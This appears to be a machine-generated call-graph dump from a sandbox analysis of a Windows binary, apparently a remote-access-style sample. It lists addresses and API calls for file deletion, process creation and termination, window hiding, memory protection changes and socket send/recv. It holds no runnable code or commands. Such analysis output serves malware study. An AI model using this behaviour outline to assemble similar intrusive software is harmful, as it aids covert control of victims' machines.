68460->68469 68462 10001ce9 68703 10004be0 28 API calls 68462->68703 68465 10001d04 68704 10004be0 28 API calls 68465->68704 68467 10004c10 28 API calls 68467->68469 68468 10001d1d 68705 10004be0 28 API calls 68468->68705 68469->68444 68469->68454 68469->68460 68469->68467 68693 100033e0 28 API calls 68469->68693 68694 10003500 28 API calls 68469->68694 68695 100064b0 36 API calls 68469->68695 68696 10003730 26 API calls 68469->68696 68697 10003460 28 API calls 68469->68697 68698 100036a0 28 API calls 68469->68698 68472 10001d38 68706 10004be0 28 API calls 68472->68706 68474 10001d51 68707 10004be0 28 API calls 68474->68707 68476 10001d69 68708 10004be0 28 API calls 68476->68708 68478 10001d7f 68709 10004be0 28 API calls 68478->68709 68480 10001d9a 68481 100036c0 26 API calls 68480->68481 68482 10001da5 68481->68482 68483 100036c0 26 API calls 68482->68483 68484 10001dad 68483->68484 68485 100036c0 26 API calls 68484->68485 68486 10001db8 68485->68486 68487 100036c0 26 API calls 68486->68487 68488 10001dc3 68487->68488 68489 100036c0 26 API calls 68488->68489 68490 10001dce 68489->68490 68491 100036c0 26 API calls 68490->68491 68492 10001dd9 68491->68492 68493 100036c0 26 API calls 68492->68493 68494 10001de4 68493->68494 68495 100036c0 26 API calls 68494->68495 68496 10001def 68495->68496 68497 100036c0 26 API calls 68496->68497 68498 10001dfa 68497->68498 68499 100036c0 26 API calls 68498->68499 68500 10001e05 68499->68500 68501 100036c0 26 API calls 68500->68501 68502 10001e10 68501->68502 68710 100038d0 28 API calls 68502->68710 68504 10001e1b 68711 100038d0 28 API calls 68504->68711 68506 10001e26 68712 100038d0 28 API calls 68506->68712 68508 10001e31 68713 10003460 28 API calls 68508->68713 68510 10001e3c 68714 10003460 28 API calls 68510->68714 68512 10001e44 68715 10003460 28 API calls 68512->68715 68514 10001e4f 68716 10003460 28 API calls 68514->68716 68516 10001e5a 68717 10003460 28 API calls 68516->68717 68518 10001e65 68519 100036c0 26 API calls 68518->68519 68520 10001e70 68519->68520 68521 100036c0 26 API calls 68520->68521 68522 10001e7b 68521->68522 68523 100036c0 26 API calls 68522->68523 68524 10001e86 68523->68524 68525 100036c0 26 API calls 68524->68525 68526 10001e8e 68525->68526 68527 100036c0 26 API calls 68526->68527 68528 10001e99 68527->68528 68529 100036c0 26 API calls 68528->68529 68530 10001ea4 68529->68530 68531 100036c0 26 API calls 68530->68531 68532 10001eaf 68531->68532 68533 100036c0 26 API calls 68532->68533 68534 10001eba 68533->68534 68536 10005f53 68535->68536 68537 10003970 28 API calls 68536->68537 68538 10005f99 68537->68538 68539 10004330 28 API calls 68538->68539 68540 10005faf PathFileExistsW 68539->68540 68541 10005fd2 68540->68541 68542 10005fc7 68540->68542 68543 10003970 28 API calls 68541->68543 68544 100012f1 68542->68544 68545 10004160 28 API calls 68542->68545 68543->68542 68544->68382 68544->68384 68545->68544 68547 10006053 68546->68547 68548 10003970 28 API calls 68547->68548 68549 10006099 68548->68549 68550 10004330 28 API calls 68549->68550 68551 100060af PathFileExistsW 68550->68551 68552 100060d2 68551->68552 68554 100060c7 68551->68554 68553 10003970 28 API calls 68552->68553 68553->68554 68555 1000135c 68554->68555 68556 10004160 28 API calls 68554->68556 68555->68388 68555->68390 68556->68555 68558 10006153 68557->68558 68559 10003970 28 API calls 68558->68559 68560 10006199 68559->68560 68561 10004330 28 API calls 68560->68561 68562 100061af PathFileExistsW 68561->68562 68563 100061d2 68562->68563 68565 100061c7 68562->68565 68564 10003970 28 API calls 68563->68564 68564->68565 68566 100013c7 68565->68566 68567 10004160 28 API calls 68565->68567 68566->68394 68566->68398 68567->68566 68569 10005c37 68568->68569 68570 10003970 28 API calls 68569->68570 68571 10005c79 68570->68571 68572 10004330 28 API calls 68571->68572 68573 10005c8f 68572->68573 68574 10004d80 28 API calls 68573->68574 68575 10005c9f FindFirstFileW 68574->68575 68577 10005cc2 68575->68577 68578 10005ccc 68575->68578 68579 10004160 28 API calls 68577->68579 68580 10005d04 FindNextFileW 68578->68580 68581 10005ce5 68578->68581 68579->68578 68582 10005e96 FindClose 68580->68582 68594 10005d36 68580->68594 68583 10003970 28 API calls 68581->68583 68584 100034a0 28 API calls 68582->68584 68585 10005cff 68583->68585 68587 10005ea9 68584->68587 68589 1000142c 68585->68589 68590 10004160 28 API calls 68585->68590 68586 10005e84 FindNextFileW 68586->68582 68586->68594 68588 100036c0 26 API calls 68587->68588 68588->68585 68589->68400 68590->68589 68591 10003970 28 API calls 68591->68594 68592 10004d80 28 API calls 68592->68594 68593 10006d90 28 API calls 68593->68594 68594->68586 68594->68591 68594->68592 68594->68593 68595 10004160 28 API calls 68594->68595 68596 10005e5c PathFileExistsW 68594->68596 68598 10004160 28 API calls 68594->68598 68599 10005e7a 68594->68599 68595->68594 68596->68594 68597 10005ed9 FindClose 68596->68597 68600 10005eeb 68597->68600 68598->68596 68601 10004160 28 API calls 68599->68601 68600->68587 68602 10004160 28 API calls 68600->68602 68601->68586 68602->68587 68604 10007a68 GetFileSize 68603->68604 68605 10007aca 68603->68605 68606 10007a94 68604->68606 68608 10007a7b ReadFile 68604->68608 68605->68413 68718 10008280 68606->68718 68610 10007ad2 CloseHandle 68608->68610 68611 10007ac4 CloseHandle 68608->68611 68610->68413 68611->68605 68613 10006253 68612->68613 68614 10003970 28 API calls 68613->68614 68615 10006299 68614->68615 68616 10003a70 28 API calls 68615->68616 68617 100062d0 68616->68617 68730 10007ae0 68617->68730 68620 10006300 68621 10006333 68620->68621 68624 10004160 28 API calls 68620->68624 68622 10004330 28 API calls 68621->68622 68625 10006342 PathFileExistsW 68622->68625 68623 10004160 28 API calls 68623->68620 68624->68621 68626 10006365 68625->68626 68628 1000635a 68625->68628 68627 10003970 28 API calls 68626->68627 68627->68628 68629 10006395 68628->68629 68630 10004160 28 API calls 68628->68630 68629->68437 68630->68629 68632 100025e4 ___scrt_fastfail 68631->68632 68743 10004ab0 68632->68743 68636 1000274a 68753 10004e80 68636->68753 68638 10002762 68639 10004cc0 28 API calls 68638->68639 68640 10002778 CreateProcessW 68639->68640 68642 100027bc 68640->68642 68756 10002b20 68642->68756 68645 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 68647 10002acc 68645->68647 68650 100036c0 26 API calls 68647->68650 68648 1000296f 68649 10003860 28 API calls 68648->68649 68651 10002983 68649->68651 68652 10002ad7 68650->68652 68651->68645 68652->68437 68654 10007e40 68653->68654 68654->68654 68655 10007ebc FindFirstFileW 68654->68655 68656 10008092 68655->68656 68657 10007ee2 68655->68657 68656->68419 68658 10007f02 FindNextFileW 68657->68658 68661 1000808b FindClose 68657->68661 68662 10008021 SetFileAttributesW 68657->68662 68663 10008033 DeleteFileW 68657->68663 68664 10007fed RemoveDirectoryW 68657->68664 68658->68657 68659 1000806d GetLastError 68658->68659 68660 10008078 FindClose RemoveDirectoryW 68659->68660 68659->68661 68660->68419 68661->68656 68662->68663 68663->68657 68663->68661 68664->68657 68666 100063e3 68665->68666 68667 10003970 28 API calls 68666->68667 68668 10006429 68667->68668 68669 10004330 28 API calls 68668->68669 68670 1000643f PathFileExistsW 68669->68670 68671 10006462 68670->68671 68673 10006457 68670->68673 68672 10003970 28 API calls 68671->68672 68672->68673 68674 10006492 68673->68674 68675 10004160 28 API calls 68673->68675 68674->68441 68675->68674 68677 10007df4 68676->68677 68678 10007e20 9 API calls 68677->68678 68679 10007e01 Sleep 68677->68679 68680 10001c6b 68677->68680 68678->68677 68679->68677 68679->68680 68681 10004c10 68680->68681 68682 10004c5e 68681->68682 68800 100050b0 68682->68800 68686 10004c92 68812 10003ff0 28 API calls std::_Xinvalid_argument 68686->68812 68688 10001c81 68699 10004be0 28 API calls 68688->68699 68689->68437 68691->68441 68692->68441 68693->68469 68694->68469 68695->68469 68696->68469 68697->68469 68698->68469 68699->68453 68700->68456 68701->68459 68702->68462 68703->68465 68704->68468 68705->68472 68706->68474 68707->68476 68708->68478 68709->68480 68710->68504 68711->68506 68712->68508 68713->68510 68714->68512 68715->68514 68716->68516 68717->68518 68719 10008352 68718->68719 68720 1000829a 68718->68720 68728 1000a5a6 28 API calls 2 library calls 68719->68728 68722 1000835c 68720->68722 68723 100082ae 68720->68723 68727 100082bc ___scrt_fastfail 68720->68727 68729 1000a5a6 28 API calls 2 library calls 68722->68729 68726 10004460 28 API calls 68723->68726 68723->68727 68726->68727 68727->68608 68732 10007b1b 68730->68732 68731 10007bef 68734 100062e2 68731->68734 68735 10004160 28 API calls 68731->68735 68732->68731 68733 10003970 28 API calls 68732->68733 68736 10007b89 68733->68736 68734->68620 68734->68623 68735->68734 68742 10005130 28 API calls 2 library calls 68736->68742 68738 10007bbf 68739 10003a70 28 API calls 68738->68739 68740 10007bdd 68739->68740 68740->68731 68741 10004160 28 API calls 68740->68741 68741->68731 68742->68738 68747 10004afc 68743->68747 68744 10004330 28 API calls 68745 10004b57 68744->68745 68746 10004890 28 API calls 68745->68746 68748 10002734 68746->68748 68747->68744 68749 10004cc0 68748->68749 68750 10004ce0 68749->68750 68750->68750 68751 10004330 28 API calls 68750->68751 68752 10004d08 ___BuildCatchObject 68751->68752 68752->68636 68754 10004890 28 API calls 68753->68754 68755 10004ea2 ___BuildCatchObject 68754->68755 68755->68638 68757 10002b42 68756->68757 68790 10007310 LoadLibraryW 68757->68790 68759 10002b6f 68760 10002b75 68759->68760 68766 10002b96 68759->68766 68761 10003dc0 28 API calls 68760->68761 68762 10002b91 68761->68762 68763 100036c0 26 API calls 68762->68763 68764 10002951 68763->68764 68764->68645 68783 10003860 68764->68783 68765 10002bf2 GetLastError 68765->68762 68766->68765 68772 10002c15 68766->68772 68767 10002d5b 68770 100036c0 26 API calls 68767->68770 68768 10002cd2 68795 10002db0 28 API calls 68768->68795 68770->68762 68771 100036c0 26 API calls 68771->68767 68772->68767 68772->68768 68794 10003570 28 API calls std::_Xinvalid_argument 68772->68794 68773 10002cdd 68774 10002d29 68773->68774 68775 10002d07 68773->68775 68796 1000daab 26 API calls _abort 68773->68796 68774->68771 68778 10002d13 68775->68778 68797 1000daab 26 API calls _abort 68775->68797 68780 10002d1f 68778->68780 68798 1000daab 26 API calls _abort 68778->68798 68780->68774 68799 1000daab 26 API calls _abort 68780->68799 68784 1000387f 68783->68784 68786 10003891 68783->68786 68785 10003dc0 28 API calls 68784->68785 68787 1000388a 68785->68787 68786->68786 68788 10003dc0 28 API calls 68786->68788 68787->68648 68789 100038aa 68788->68789 68789->68648 68791 10007326 8 API calls 68790->68791 68792 100073dd 68790->68792 68791->68792 68793 1000739f 68791->68793 68792->68759 68793->68759 68793->68792 68794->68772 68795->68773 68801 100050c2 68800->68801 68810 10004c86 68800->68810 68802 10005121 68801->68802 68803 100050ce 68801->68803 68801->68810 68814 1000a5a6 28 API calls 2 library calls 68802->68814 68805 100050d2 68803->68805 68808 100050f3 68803->68808 68807 10004460 28 API calls 68805->68807 68807->68810 68808->68810 68813 10003c00 26 API calls 68808->68813 68811 10003ff0 28 API calls std::_Xinvalid_argument 68810->68811 68811->68686 68812->68688 68813->68810 68815 402bcc 68816 402bd7 68815->68816 68817 402bdf 68815->68817 68823 403315 68816->68823 68819 402beb 68817->68819 68830 4015d3 68817->68830 68824 4015d3 22 API calls 68823->68824 68825 40332a 68824->68825 68826 402bdd 68825->68826 68827 40333b 68825->68827 68840 43a854 11 API calls _abort 68827->68840 68829 43a853 68832 43360d 68830->68832 68833 402be9 68832->68833 68836 43362e std::_Facet_Register 68832->68836 68841 43a88c 68832->68841 68848 442200 7 API calls 2 library calls 68832->68848 68835 433dec std::_Facet_Register 68850 437bd7 RaiseException 68835->68850 68836->68835 68849 437bd7 RaiseException 68836->68849 68839 433e09 68840->68829 68846 446aff _strftime 68841->68846 68842 446b3d 68852 445354 20 API calls _free 68842->68852 68844 446b28 RtlAllocateHeap 68845 446b3b 68844->68845 68844->68846 68845->68832 68846->68842 68846->68844 68851 442200 7 API calls 2 library calls 68846->68851 68848->68832 68849->68835 68850->68839 68851->68846 68852->68845 68853 1001500e 68864 100192b0 68853->68864 68858 1001502b 68860 10015a65 _free 20 API calls 68858->68860 68861 10015060 68860->68861 68862 10015036 68881 10015a65 68862->68881 68865 100192b9 68864->68865 68866 10015020 68864->68866 68887 100191af 51 API calls 5 library calls 68865->68887 68868 10019622 GetEnvironmentStringsW 68866->68868 68869 10019639 68868->68869 68870 1001968c 68868->68870 68873 1001963f WideCharToMultiByte 68869->68873 68871 10019695 FreeEnvironmentStringsW 68870->68871 68872 10015025 68870->68872 68871->68872 68872->68858 68880 100150ba 26 API calls 4 library calls 68872->68880 68873->68870 68874 1001965b 68873->68874 68888 10015a9f 21 API calls 3 library calls 68874->68888 68876 10019661 68877 1001967e 68876->68877 68878 10019668 WideCharToMultiByte 68876->68878 68879 10015a65 _free 20 API calls 68877->68879 68878->68877 68879->68870 68880->68862 68882 10015a70 RtlFreeHeap 68881->68882 68883 10015a99 __dosmaperr 68881->68883 68882->68883 68884 10015a85 68882->68884 68883->68858 68889 100160ec 20 API calls __dosmaperr 68884->68889 68886 10015a8b GetLastError 68886->68883 68887->68866 68888->68876 68889->68886 68890 10007890 CreateToolhelp32Snapshot 68891 100078e2 68890->68891 68892 100078bf Process32FirstW 68890->68892 68893 100078db CloseHandle 68892->68893 68894 100078f0 68892->68894 68893->68891 68895 10003970 28 API calls 68894->68895 68896 10004160 28 API calls 68894->68896 68897 10007a10 Process32NextW 68894->68897 68898 100079d1 FindWindowExA GetWindowThreadProcessId 68894->68898 68895->68894 68896->68894 68897->68894 68899 10007a2c CloseHandle 68897->68899 68898->68894 68900 100079f7 ShowWindow 68898->68900 68900->68894 68901 457c7a7 68902 457c7be 68901->68902 68911 457c81c 68901->68911 68902->68911 68912 457c7e6 GetModuleHandleA 68902->68912 68904 457c835 GetModuleHandleA 68906 457c83f 68904->68906 68905 457c872 68906->68906 68908 457c85f GetProcAddress 68906->68908 68906->68911 68908->68911 68911->68904 68911->68905 68911->68906 68913 457c7ef 68912->68913 68918 457c81c 68912->68918 68923 457c803 GetProcAddress 68913->68923 68916 457c835 GetModuleHandleA 68922 457c83f 68916->68922 68917 457c872 68918->68916 68918->68917 68918->68922 68921 457c85f GetProcAddress 68921->68918 68922->68918 68922->68921 68924 457c80d VirtualProtect 68923->68924 68925 457c81c 68923->68925 68924->68925 68926 457c835 GetModuleHandleA 68925->68926 68927 457c872 68925->68927 68929 457c83f 68926->68929 68928 457c85f GetProcAddress 68928->68929 68929->68925 68929->68928 68930 41d4d0 68932 41d4e6 _Yarn ___scrt_fastfail 68930->68932 68931 41d6e3 68936 41d734 68931->68936 68946 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 68931->68946 68932->68931 68934 431f99 21 API calls 68932->68934 68938 41d696 ___scrt_fastfail 68934->68938 68935 41d6f4 68935->68936 68937 41d760 68935->68937 68947 431f99 68935->68947 68937->68936 68955 41d474 21 API calls ___scrt_fastfail 68937->68955 68938->68936 68940 431f99 21 API calls 68938->68940 68944 41d6be ___scrt_fastfail 68940->68944 68942 41d72d ___scrt_fastfail 68942->68936 68952 43264f 68942->68952 68944->68936 68945 431f99 21 API calls 68944->68945 68945->68931 68946->68935 68948 431fa3 68947->68948 68949 431fa7 68947->68949 68948->68942 68950 43a88c ___std_exception_copy 21 API calls 68949->68950 68951 431fac 68950->68951 68951->68942 68956 43256f 68952->68956 68954 432657 68954->68937 68955->68936 68957 432588 68956->68957 68961 43257e 68956->68961 68958 431f99 21 API calls 68957->68958 68957->68961 68959 4325a9 68958->68959 68959->68961 68962 43293a CryptAcquireContextA 68959->68962 68961->68954 68963 43295b CryptGenRandom 68962->68963 68965 432956 68962->68965 68964 432970 CryptReleaseContext 68963->68964 68963->68965 68964->68965 68965->68961 68966 426030 68971 4260f7 recv 68966->68971 68972 10009293 68973 10009299 68972->68973 69014 10008550 68973->69014 68976 10003dc0 28 API calls 68978 100093aa 68976->68978 68977 10008550 44 API calls 68979 100092e7 68977->68979 68980 100036c0 26 API calls 68978->68980 68981 10008550 44 API calls 68979->68981 68988 100092ef 68979->68988 68982 100093bf 68980->68982 68983 1000931a 68981->68983 68984 100093c4 68982->68984 68985 10009408 send 68982->68985 68986 10008550 44 API calls 68983->68986 68983->68988 69017 100084c0 70 API calls 68984->69017 68990 10009423 68985->68990 68986->68988 68988->68976 68989 100097c1 68991 1000948a send 68990->68991 68992 100094b4 68991->68992 68993 100094c7 send 68992->68993 68994 100094f0 68993->68994 68995 10009507 send 68994->68995 68996 10009520 68995->68996 68997 1000956e 68995->68997 68999 10009557 send 68996->68999 68998 1000959d send 68997->68998 69000 100095c2 68998->69000 68999->68997 69001 100095d7 send 69000->69001 69002 100095fc 69001->69002 69003 1000960f send 69002->69003 69004 10009620 69003->69004 69005 10009641 recv 69004->69005 69006 10009660 69004->69006 69005->68989 69005->69004 69007 10008550 44 API calls 69006->69007 69008 10009698 69007->69008 69008->68984 69010 100096ae 69008->69010 69009 100096d7 recv 69009->68989 69009->69010 69010->69009 69011 10009704 setsockopt ioctlsocket 69010->69011 69012 1000a5f3 new 22 API calls 69011->69012 69013 1000973a 69012->69013 69018 10008520 69014->69018 69017->68989 69019 10008534 ___scrt_initialize_default_local_stdio_options 69018->69019 69022 100147a1 69019->69022 69025 1000ff27 69022->69025 69026 1000ff44 69025->69026 69027 1000ff59 69025->69027 69045 100160ec 20 API calls __dosmaperr 69026->69045 69027->69026 69030 1000ff5f 69027->69030 69029 1000ff49 69046 1000da9b 26 API calls _abort 69029->69046 69030->69030 69047 1000e3c5 38 API calls 2 library calls 69030->69047 69033 1000ff54 69038 1000b288 69033->69038 69034 1000ff84 69048 10013d6a 44 API calls 2 library calls 69034->69048 69036 1000853e 69036->68977 69036->68988 69039 1000b291 69038->69039 69040 1000b293 IsProcessorFeaturePresent 69038->69040 69039->69036 69042 1000b2d5 69040->69042 69049 1000b299 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 69042->69049 69044 1000b3b8 69044->69036 69045->69029 69046->69033 69047->69034 69048->69033 69049->69044 69050 426091 69055 42610e send 69050->69055 69056 425e56 69057 425e6b 69056->69057 69067 425f0b 69056->69067 69058 425eee 69057->69058 69059 425f5a 69057->69059 69060 425eb9 69057->69060 69066 425f25 69057->69066 69057->69067 69070 425f77 69057->69070 69071 425f9e 69057->69071 69084 424354 48 API calls _Yarn 69057->69084 69058->69066 69058->69067 69086 424354 48 API calls _Yarn 69058->69086 69059->69070 69088 424b7b 21 API calls 69059->69088 69060->69058 69060->69067 69085 41f075 52 API calls 69060->69085 69066->69059 69066->69067 69087 41f075 52 API calls 69066->69087 69070->69067 69070->69071 69072 424f78 69070->69072 69071->69067 69089 4255c7 28 API calls 69071->69089 69074 424f97 ___scrt_fastfail 69072->69074 69073 424fab 69079 424fcb 69073->69079 69080 424fb4 69073->69080 69092 41cf6e 48 API calls 69073->69092 69076 424fa6 69074->69076 69074->69079 69090 41e097 21 API calls 69074->69090 69076->69073 69076->69079 69091 41fad4 45 API calls 69076->69091 69079->69071 69080->69079 69093 424185 21 API calls 2 library calls 69080->69093 69082 42504e 69082->69079 69083 431f99 21 API calls 69082->69083 69083->69073 69084->69060 69085->69060 69086->69066 69087->69066 69088->69070 69089->69067 69090->69076 69091->69082 69092->69080 69093->69079 69094 416017 69095 416020 69094->69095 69111 416057 69094->69111 69130 401d64 69095->69130 69097 41602b 69099 401d64 28 API calls 69097->69099 69101 416038 69099->69101 69135 4027ec 69101->69135 69103 416043 69139 4027cb 69103->69139 69104 401d64 28 API calls 69106 416087 69104->69106 69108 401d64 28 API calls 69106->69108 69107 41604f 69142 405d07 69107->69142 69110 416094 69108->69110 69112 4027ec 28 API calls 69110->69112 69157 401f86 69111->69157 69113 41609f 69112->69113 69114 4027cb 28 API calls 69113->69114 69115 4160ab 69114->69115 69161 405d67 119 API calls 69115->69161 69117 4160b7 69162 401eea 69117->69162 69119 4160c0 69120 401eea 11 API calls 69119->69120 69121 4161e9 69120->69121 69122 4161f2 69121->69122 69123 401eea 11 API calls 69121->69123 69166 401d8c 69122->69166 69123->69122 69125 4161fb 69126 401eea 11 API calls 69125->69126 69127 416207 69126->69127 69128 401eea 11 API calls 69127->69128 69129 416213 69128->69129 69131 401d6c 69130->69131 69132 401d74 69131->69132 69172 401fff 28 API calls 69131->69172 69132->69097 69134 401d8b 69136 4027f8 69135->69136 69173 402e78 69136->69173 69138 402814 69138->69103 69182 401e9b 69139->69182 69141 4027d9 69141->69107 69191 401ebd 69142->69191 69158 401f8e 69157->69158 69159 402325 28 API calls 69158->69159 69160 401fa4 69159->69160 69160->69104 69161->69117 69164 4021b9 69162->69164 69163 4021e8 69163->69119 69164->69163 69165 40262e 11 API calls 69164->69165 69165->69163 69167 40200a 69166->69167 69168 402654 11 API calls 69167->69168 69171 40203a 69167->69171 69169 40202b 69168->69169 70085 4026ba 11 API calls _Deallocate 69169->70085 69171->69125 69172->69134 69174 402e85 69173->69174 69175 402ea9 69174->69175 69176 402e98 69174->69176 69178 402eae 69174->69178 69175->69138 69180 403445 28 API calls 69176->69180 69178->69175 69181 40225b 11 API calls 69178->69181 69180->69175 69181->69175 69183 401ea7 69182->69183 69186 40245c 69183->69186 69185 401eb9 69185->69141 69187 402469 69186->69187 69189 402478 69187->69189 69190 402ad3 28 API calls 69187->69190 69189->69185 69190->69189 69193 401ec9 69191->69193 69192 401ee4 69195 4040bb 69192->69195 69193->69192 69294 402325 69193->69294 69196 4040cb 69195->69196 69197 4040fa 69196->69197 69299 4041f1 69196->69299 69199 40428c connect 69197->69199 69200 4043e1 69199->69200 69201 4042b3 69199->69201 69202 404343 69200->69202 69203 4043e7 WSAGetLastError 69200->69203 69201->69202 69204 4042e8 69201->69204 69307 404cbf 69201->69307 69259 401fbd 69202->69259 69203->69202 69205 4043f7 69203->69205 69339 420151 27 API calls 69204->69339 69208 4042f7 69205->69208 69209 4043fc 69205->69209 69214 401f66 28 API calls 69208->69214 69344 41bc76 69209->69344 69210 4042f0 69210->69208 69213 404306 69210->69213 69211 4042d4 69311 401f66 69211->69311 69224 404315 69213->69224 69225 40434c 69213->69225 69217 404448 69214->69217 69220 401f66 28 API calls 69217->69220 69226 404457 69220->69226 69222 404418 69223 401f66 28 API calls 69222->69223 69227 404427 69223->69227 69229 401f66 28 API calls 69224->69229 69341 420f34 54 API calls 69225->69341 69230 41a686 79 API calls 69226->69230 69231 41a686 79 API calls 69227->69231 69233 404324 69229->69233 69230->69202 69234 40442c 69231->69234 69232 404354 69235 404389 69232->69235 69236 404359 69232->69236 69237 401f66 28 API calls 69233->69237 69238 401eea 11 API calls 69234->69238 69343 4202ea 28 API calls 69235->69343 69239 401f66 28 API calls 69236->69239 69240 404333 69237->69240 69238->69202 69242 404368 69239->69242 69243 41a686 79 API calls 69240->69243 69245 401f66 28 API calls 69242->69245 69246 404338 69243->69246 69244 404391 69247 4043be CreateEventW CreateEventW 69244->69247 69248 401f66 28 API calls 69244->69248 69249 404377 69245->69249 69340 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69246->69340 69247->69202 69250 4043a7 69248->69250 69251 41a686 79 API calls 69249->69251 69253 401f66 28 API calls 69250->69253 69254 40437c 69251->69254 69255 4043b6 69253->69255 69342 420592 52 API calls 69254->69342 69257 41a686 79 API calls 69255->69257 69258 4043bb 69257->69258 69258->69247 69260 401fcc 69259->69260 69369 402501 69260->69369 69262 401fea 69263 404468 69262->69263 69264 40447b 69263->69264 69374 404be8 69264->69374 69266 404490 _Yarn 69267 404507 WaitForSingleObject 69266->69267 69268 4044e7 69266->69268 69269 40451d 69267->69269 69270 4044f9 send 69268->69270 69378 42051a 54 API calls 69269->69378 69271 404542 69270->69271 69274 401eea 11 API calls 69271->69274 69273 404530 SetEvent 69273->69271 69275 40454a 69274->69275 69276 401eea 11 API calls 69275->69276 69277 404552 69276->69277 69278 4045d5 69277->69278 69285 4045ec 69278->69285 69279 43a88c ___std_exception_copy 21 API calls 69279->69285 69281 401f86 28 API calls 69281->69285 69282 404666 69408 4047eb WaitForSingleObject 69282->69408 69285->69279 69285->69281 69285->69282 69287 401eea 11 API calls 69285->69287 69384 40455b 69285->69384 69390 401eef 69285->69390 69394 404688 69285->69394 69287->69285 69288 401eea 11 API calls 69289 404676 69288->69289 69290 401eea 11 API calls 69289->69290 69291 40467f 69290->69291 69293 4048a6 98 API calls 69291->69293 69295 40232f 69294->69295 69297 40233a 69295->69297 69298 40294a 28 API calls 69295->69298 69297->69192 69298->69297 69300 404206 socket 69299->69300 69301 4041fd 69299->69301 69303 404220 69300->69303 69304 404224 CreateEventW 69300->69304 69306 404262 WSAStartup 69301->69306 69303->69197 69304->69197 69305 404202 69305->69300 69305->69303 69306->69305 69308 404ccb 69307->69308 69309 402e78 28 API calls 69308->69309 69310 404cee 69309->69310 69310->69211 69312 401f6e 69311->69312 69355 402301 69312->69355 69315 41a686 69316 41a737 69315->69316 69317 41a69c GetLocalTime 69315->69317 69318 401eea 11 API calls 69316->69318 69319 404cbf 28 API calls 69317->69319 69321 41a73f 69318->69321 69320 41a6de 69319->69320 69359 405ce6 69320->69359 69323 401eea 11 API calls 69321->69323 69325 41a747 69323->69325 69324 41a6ea 69326 4027cb 28 API calls 69324->69326 69325->69204 69327 41a6f6 69326->69327 69328 405ce6 28 API calls 69327->69328 69329 41a702 69328->69329 69362 406478 76 API calls 69329->69362 69331 41a710 69332 401eea 11 API calls 69331->69332 69333 41a71c 69332->69333 69334 401eea 11 API calls 69333->69334 69335 41a725 69334->69335 69336 401eea 11 API calls 69335->69336 69337 41a72e 69336->69337 69338 401eea 11 API calls 69337->69338 69338->69316 69339->69210 69340->69202 69341->69232 69342->69246 69343->69244 69367 401faa 69344->69367 69346 41bc8a FormatMessageA 69347 41bcb6 69346->69347 69348 41bca8 69346->69348 69351 41bcc1 LocalFree 69347->69351 69349 401f66 28 API calls 69348->69349 69350 41bcb4 69349->69350 69352 401eea 11 API calls 69350->69352 69351->69350 69353 40440b 69352->69353 69354 404c9e 28 API calls 69353->69354 69354->69222 69356 40230d 69355->69356 69357 402325 28 API calls 69356->69357 69358 401f80 69357->69358 69358->69315 69363 404bc4 69359->69363 69361 405cf4 69361->69324 69362->69331 69364 404bd0 69363->69364 69365 40245c 28 API calls 69364->69365 69366 404be4 69365->69366 69366->69361 69368 401fb2 69367->69368 69368->69346 69370 40250d 69369->69370 69372 40252b 69370->69372 69373 40261a 28 API calls 69370->69373 69372->69262 69373->69372 69375 404bf0 69374->69375 69379 404c0c 69375->69379 69377 404c06 69377->69266 69378->69273 69380 404c16 69379->69380 69382 404c21 69380->69382 69383 404d07 28 API calls 69380->69383 69382->69377 69383->69382 69385 404592 recv 69384->69385 69386 404565 WaitForSingleObject 69384->69386 69388 4045a5 69385->69388 69421 420556 54 API calls 69386->69421 69388->69285 69389 404581 SetEvent 69389->69388 69391 401efe 69390->69391 69393 401f0a 69391->69393 69422 4021b9 69391->69422 69393->69285 69404 4046a3 69394->69404 69395 4047d8 69396 401eea 11 API calls 69395->69396 69397 4047e1 69396->69397 69397->69285 69398 403b60 28 API calls 69398->69404 69399 401eef 11 API calls 69399->69404 69400 401eea 11 API calls 69400->69404 69401 401ebd 28 API calls 69403 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 69401->69403 69402 401fbd 28 API calls 69402->69404 69403->69404 69938 414b9b 69403->69938 69404->69395 69404->69398 69404->69399 69404->69400 69404->69401 69404->69402 69434 411b60 69404->69434 69478 405de7 69404->69478 69520 402654 69404->69520 69409 404805 SetEvent CloseHandle 69408->69409 69410 40481c closesocket 69408->69410 69411 40466d 69409->69411 69412 404829 69410->69412 69411->69288 69413 40483f 69412->69413 70082 404ab1 83 API calls 69412->70082 69415 404851 WaitForSingleObject 69413->69415 69416 404892 SetEvent CloseHandle 69413->69416 70083 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69415->70083 69416->69411 69418 404860 SetEvent WaitForSingleObject 70084 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69418->70084 69420 404878 SetEvent CloseHandle CloseHandle 69420->69416 69421->69389 69423 4021c6 69422->69423 69424 4021e8 69423->69424 69426 40262e 69423->69426 69424->69393 69429 402bee 69426->69429 69428 40263b 69428->69424 69430 402bfb 69429->69430 69431 402c08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 69429->69431 69433 4015d8 11 API calls _Deallocate 69430->69433 69431->69428 69433->69431 69435 411b72 69434->69435 69523 403b60 69435->69523 69438 401fbd 28 API calls 69439 411b94 69438->69439 69440 401fbd 28 API calls 69439->69440 69441 411ba3 69440->69441 69526 41afc3 69441->69526 69443 411c60 69445 401d8c 11 API calls 69443->69445 69447 411c69 69445->69447 69446 401d64 28 API calls 69448 411bc8 69446->69448 69449 401eea 11 API calls 69447->69449 69450 401fbd 28 API calls 69448->69450 69451 411c72 69449->69451 69452 411bd0 69450->69452 69453 401eea 11 API calls 69451->69453 69454 401d64 28 API calls 69452->69454 69455 411c7a 69453->69455 69456 411be0 69454->69456 69455->69404 69457 401fbd 28 API calls 69456->69457 69458 411be8 69457->69458 69459 401d64 28 API calls 69458->69459 69460 411bf8 69459->69460 69461 401fbd 28 API calls 69460->69461 69462 411c00 69461->69462 69463 401d64 28 API calls 69462->69463 69464 411c10 69463->69464 69465 401fbd 28 API calls 69464->69465 69466 411c18 69465->69466 69467 401d64 28 API calls 69466->69467 69468 411c28 69467->69468 69469 401fbd 28 API calls 69468->69469 69470 411c30 69469->69470 69471 401d64 28 API calls 69470->69471 69472 411c43 69471->69472 69473 401fbd 28 API calls 69472->69473 69474 411c4b 69473->69474 69547 411c81 GetModuleFileNameW 69474->69547 